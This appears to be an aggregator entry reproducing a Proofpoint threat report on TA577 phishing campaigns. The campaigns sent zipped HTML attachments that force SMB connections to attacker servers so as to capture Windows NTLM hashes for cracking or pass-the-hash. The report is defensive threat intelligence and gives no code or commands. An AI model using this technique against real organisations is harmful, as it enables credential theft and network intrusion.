One Article Review
| Source |  ProofPoint |
|---|---|
| Identifiant | 8470829 |
| Date de publication | 2024-03-26 06:00:09 (vue: 2024-03-26 16:08:13) |
| Titre | ProofPoint révèle la technique PIVOT par un groupe d'attaquant TA577: Cibler Windows NTLM Proofpoint Discloses Technique Pivot by Attacker Group TA577: Targeting Windows NTLM |
| Texte | Proofpoint was the first to uncover a concerning new development in the world of cyberthreats that involves a group known as TA577. These cybercriminals, which typically act as initial access brokers (IAB), have pivoted to attacking an old, but widely deployed Windows service to steal sensitive information. Specifically, they aim to steal at scale the hash of the NT LAN Manager (NTLM) authentication session details. Then it is expected that they either sell the data, or they exploit it for various downstream activities like stealing sensitive data and ransoming systems. The planned end result is the same, a significant business-impacting breach of the targeted organizations. How did the new attack happen? Proofpoint detected two distinct email-based campaigns that TA577 carried out on February 26 and 27, 2024. The campaigns targeted hundreds of businesses globally via tens of thousands of emails. The attackers cleverly disguised the emails as replies to previous emails. This is an effective social engineering tactic known as thread hijacking. The emails contained HTML attachments compressed into zip files. Each malicious attachment had its own unique identifier. And the HTML files contained within the attachment were customized for each recipient. Because all the hashes were unique, a simple signature-based detection system could not consistently detect and block these emails. When the email recipient opened the files, it triggered a connection to a Server Message Block (SMB) server that the threat actor controlled. No malware was directly delivered through these connections. However, the attackers\' objective was clear-to capture the details of the challenge/response transaction and the NTLM hashes of the user\'s Windows machine, which include the user\'s password authentication data. The attackers can use this data in the next stage of the attack either in hash form or by cracking the hash first to retrieve the password. Note: In this case, the use of multifactor authentication (MFA) would not stop the attack, as TA577 targeted previously authenticated users on active Windows machines. If targeted businesses used MFA, that authentication step would have already occurred; thus, it would not significantly hinder this attack. What was the attackers\' intent? As noted earlier, TA577 usually acts as an IAB. So, the group likely aimed to exploit the data that they collected by cracking password hashes or facilitating “pass-the-hash” attacks. They could sell access to other threat actors who seek to penetrate targeted companies\' networks more deeply. As part of our investigation, Proofpoint identified the use of a well-known toolkit, Impacket, on the SMB servers involved in the attack. This discovery further confirmed that the malicious intent behind TA577\'s activities is to go well beyond the initial account or system compromise. What is especially concerning about this attack approach is that any connection to the SMB servers would compromise sensitive information that includes: Usernames Passwords Session hashes Domain names Computer names More troubling is the fact that the attackers delivered the malicious HTML files within zip archives. That means they bypassed measures in Outlook mail clients last patched before July 2023. If your email security provider did not block the inbound email and a user engaged with the message, your last hope to avoid the compromise is the timeliness of your software patching program. The impacts on businesses This attack is based on an old protocol (NTLM) from the 1990s. But this new twist by TA577 is noteworthy because it represents a departure from the group\'s usual tactics of delivering malware and bots directly. It suggests that the group is adapting and evolving. They are seeking new ways to bypass security measures and monetize their campaigns. This cyberthreat poses a significant risk to businesses that run Microsoft Windows. Through the theft of NTLM authenti |
| Envoyé | Oui |
| Condensat | 000 1990s 2023 2024 230 about above abuse access account accounts achieve across act actions active activities actor actors acts adapting against aim aimed all already also always analytics any application apply approach archives are attachment attachments attack attack: attacker attackers attacking attacks authenticated authentication avoid awareness based because before behavior behind beyond block bots breach brokers business businesses businesses but bypass bypassed campaigns can capture carried case challenge/response changes check choose clear cleverly clients codes collected combat companies comprehensive compressed compromise computer concerning confidential configuration confirmed connection connections consequences consistently constant constantly contained continuously controlled controls could covers cracking curates current customized cybercriminals cybersecurity cyberthreat cyberthreats damage data date decide deeply defend defense delivered delivering departure deploy deployed depth depth details detect detected detection development did direct directly discloses discovery disguised distinct domain downstream each earlier education effective either email emails employees end engaged engaging engineering escalate escalation especially even evolving expand expected exploit extensive extent facilitating fact failure features february files financial findings first form from from 183 further gain generative get global globally good great group had happen hash hashes hashes hash” have help here highlights hijacking hinder hope host hosts how however html human hundreds hygiene iab identified identifier identity impacket impacting impacts improve inbound include includes: including incorporates information informed initial insights intellectual intelligence intent investigation involved involves its july known lan landscape last lateral lead learn legal like likely lookout losses machine machines mail make malicious malware manage manager means measures message mfa microsoft million mix monetize monitor month more more most movement moves multifactor names need network networks new next not note: noted noteworthy ntlm objective occurred; off old opened orchestrated organizations other out outbound outlined outlook over overview own part password passwords past patch patched patching penetrate people period phish phishing pivot pivoted planned poses possible practice prevent previous previously privilege privileges program proofpoint property protocol provide provider provides ransom ransoming recipient records regularly repercussions replies report represents reputational required researchers response result retrieve risk risks run same scale scanned security seek seeking sell sensitive sent server servers service services session severe signature significant significantly simple simulated six smb social software some sophisticated specifically stage stakeholders state steal stealing step steps stop suggests sure suspicious system systems ta577 ta577: tactic tactics take targeted targeting technique techniques technologies technology telemetry tens than 2 theft then these thousands thread threat through thus timeliness toolkit training transaction triggered trillion troubling tuning turn twist two type typically ultimately unauthorized uncover understand undetected unique unused unusual use used user usernames users usual usually various vendor visibility ways well what when which who widely will windows within world worldwide would your zip block “pass each |
| Tags | Malware Threat Patching |
| Stories | |
| Notes | ★★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.